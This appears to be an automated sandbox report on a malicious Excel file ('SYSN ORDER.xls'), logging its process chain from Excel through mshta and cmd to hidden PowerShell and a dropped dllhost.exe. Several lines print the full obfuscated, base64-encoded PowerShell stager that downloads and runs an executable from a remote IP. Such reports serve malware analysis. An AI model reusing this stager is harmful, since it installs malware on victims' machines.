            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................Py.............................}..w..............D.......D......1D.....(.P.......D......3D......................(..............
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cmy...................../Y.l....}..w.....(......\.F.......D.............(.P.....\...............H...............................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................(......}..w..............g......X.l............(.P.....\...............................................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cmy...................../Y.l....}..w.....(......\.F.......D.............(.P.....\...............H...............................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................(......}..w..............g......X.l............(.P.....\...............................................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................t.h.a.t. .t.h.e. .p.a.t.h. .i.s. .c.o.r.r.e.c.t. .a.n.d. .t.r.y. .a.g.a.i.n.............N.......................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1...g......X.l............(.P.....\....................... .......................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................(......}..w..............g......X.l............(.P.....\...............................................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.\.......................@.......................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................(......}..w..............g......X.l............(.P.....\...............................................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .S.t.r.i.n.g.). .[.].,. .C.o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...........N.......................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................(......}..w..............g......X.l............(.P.....\.......................l.......................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ ........(......}..w..............g......X.l............(.P.....\...............................................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................(..............0..x1....W......}..w....H.......@EE.....^...............(.P.....\...............................................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................(..................1....W......}..w....H.......@EE.....^...............(.P.....\...............................................
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
            Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: SYSN ORDER.xlsReversingLabs: Detection: 21%
            Source: SYSN ORDER.xlsVirustotal: Detection: 25%
            Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwerSHELL -eX BypASs -NoP -w 1 -c DevicecREdENtIalDepLoYMent.Exe ; ieX($(ieX('[syStEM.texT.encOdiNg]'+[ChaR]0x3A+[cHAr]0x3a+'UtF8.geTStriNG([SYsTEm.conVeRT]'+[Char]58+[CHAR]58+'FromBAse64STriNG('+[chaR]34+'JFltICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFckRlZmluSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbW9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpVcXgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWGV0dVN2RXMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVmVsLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBudEUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTGtQZERQKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiTVAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNJbGFmR2lhYnZyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRZbTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjYvNzcwL2RsbGhvc3QuZXhlIiwiJEVOdjpBUFBEQVRBXGRsbGhvc3QuZXhlIiwwLDApO3NUQXJ0LXNsZUVwKDMpO1N0QVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxkbGxob3N0LmV4ZSI='+[chAR]0X22+'))')))"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwerSHELL -eX BypASs -NoP -w 1 -c DevicecREdENtIalDepLoYMent.Exe ; ieX($(ieX('[syStEM.texT.encOdiNg]'+[ChaR]0x3A+[cHAr]0x3a+'UtF8.geTStriNG([SYsTEm.conVeRT]'+[Char]58+[CHAR]58+'FromBAse64STriNG('+[chaR]34+'JFltICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFckRlZmluSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbW9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpVcXgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWGV0dVN2RXMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVmVsLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBudEUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTGtQZERQKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiTVAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNJbGFmR2lhYnZyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRZbTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjYvNzcwL2RsbGhvc3QuZXhlIiwiJEVOdjpBUFBEQVRBXGRsbGhvc3QuZXhlIiwwLDApO3NUQXJ0LXNsZUVwKDMpO1N0QVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxkbGxob3N0LmV4ZSI='+[chAR]0X22+'))')))"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ngxpd0hb\ngxpd0hb.cmdline"
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4348.tmp" "c:\Users\user\AppData\Local\Temp\ngxpd0hb\CSCA3EB236CC00F4C599499BBB2E0A3996.TMP"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\dllhost.exe "C:\Users\user\AppData\Roaming\dllhost.exe"
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
            Source: C:\Users\user\AppData\Roaming\dllhost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Roaming\dllhost.exe"
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwerSHELL -eX BypASs -NoP -w 1 -c DevicecREdENtIalDepLoYMent.Exe ; ieX($(ieX('[syStEM.texT.encOdiNg]'+[ChaR]0x3A+[cHAr]0x3a+'UtF8.geTStriNG([SYsTEm.conVeRT]'+[Char]58+[CHAR]58+'FromBAse64STriNG('+[chaR]34+'JFltICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFckRlZmluSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbW9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpVcXgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWGV0dVN2RXMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVmVsLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBudEUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTGtQZERQKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiTVAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNJbGFmR2lhYnZyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRZbTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjYvNzcwL2RsbGhvc3QuZXhlIiwiJEVOdjpBUFBEQVRBXGRsbGhvc3QuZXhlIiwwLDApO3NUQXJ0LXNsZUVwKDMpO1N0QVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxkbGxob3N0LmV4ZSI='+[chAR]0X22+'))')))"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwerSHELL -eX BypASs -NoP -w 1 -c DevicecREdENtIalDepLoYMent.Exe ; ieX($(ieX('[syStEM.texT.encOdiNg]'+[ChaR]0x3A+[cHAr]0x3a+'UtF8.geTStriNG([SYsTEm.conVeRT]'+[Char]58+[CHAR]58+'FromBAse64STriNG('+[chaR]34+'JFltICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFckRlZmluSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbW9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpVcXgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWGV0dVN2RXMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVmVsLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBudEUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTGtQZERQKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiTVAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNJbGFmR2lhYnZyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRZbTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjYvNzcwL2RsbGhvc3QuZXhlIiwiJEVOdjpBUFBEQVRBXGRsbGhvc3QuZXhlIiwwLDApO3NUQXJ0LXNsZUVwKDMpO1N0QVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxkbGxob3N0LmV4ZSI='+[chAR]0X22+'))')))"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tnesdt30\tnesdt30.cmdline"
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES866F.tmp" "c:\Users\user\AppData\Local\Temp\tnesdt30\CSC4AC68FDA20F44DF3BBC22D1FFF1AFB9.TMP"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\dllhost.exe "C:\Users\user\AppData\Roaming\dllhost.exe"
            Source: C:\Users\user\AppData\Roaming\dllhost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Roaming\dllhost.exe"
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwerSHELL -eX BypASs -NoP -w 1 -c DevicecREdENtIalDepLoYMent.Exe ; ieX($(ieX('[syStEM.texT.encOdiNg]'+[ChaR]0x3A+[cHAr]0x3a+'UtF8.geTStriNG([SYsTEm.conVeRT]'+[Char]58+[CHAR]58+'FromBAse64STriNG('+[chaR]34+'JFltICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFckRlZmluSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbW9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpVcXgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWGV0dVN2RXMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVmVsLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBudEUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTGtQZERQKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiTVAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNJbGFmR2lhYnZyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRZbTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjYvNzcwL2RsbGhvc3QuZXhlIiwiJEVOdjpBUFBEQVRBXGRsbGhvc3QuZXhlIiwwLDApO3NUQXJ0LXNsZUVwKDMpO1N0QVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxkbGxob3N0LmV4ZSI='+[chAR]0X22+'))')))"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwerSHELL -eX BypASs -NoP -w 1 -c DevicecREdENtIalDepLoYMent.Exe ; ieX($(ieX('[syStEM.texT.encOdiNg]'+[ChaR]0x3A+[cHAr]0x3a+'UtF8.geTStriNG([SYsTEm.conVeRT]'+[Char]58+[CHAR]58+'FromBAse64STriNG('+[chaR]34+'JFltICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFckRlZmluSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbW9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpVcXgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWGV0dVN2RXMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVmVsLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBudEUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTGtQZERQKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiTVAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNJbGFmR2lhYnZyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRZbTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjYvNzcwL2RsbGhvc3QuZXhlIiwiJEVOdjpBUFBEQVRBXGRsbGhvc3QuZXhlIiwwLDApO3NUQXJ0LXNsZUVwKDMpO1N0QVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxkbGxob3N0LmV4ZSI='+[chAR]0X22+'))')))"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ngxpd0hb\ngxpd0hb.cmdline"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\dllhost.exe "C:\Users\user\AppData\Roaming\dllhost.exe" Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4348.tmp" "c:\Users\user\AppData\Local\Temp\ngxpd0hb\CSCA3EB236CC00F4C599499BBB2E0A3996.TMP"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\dllhost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Roaming\dllhost.exe" Jump to behavior
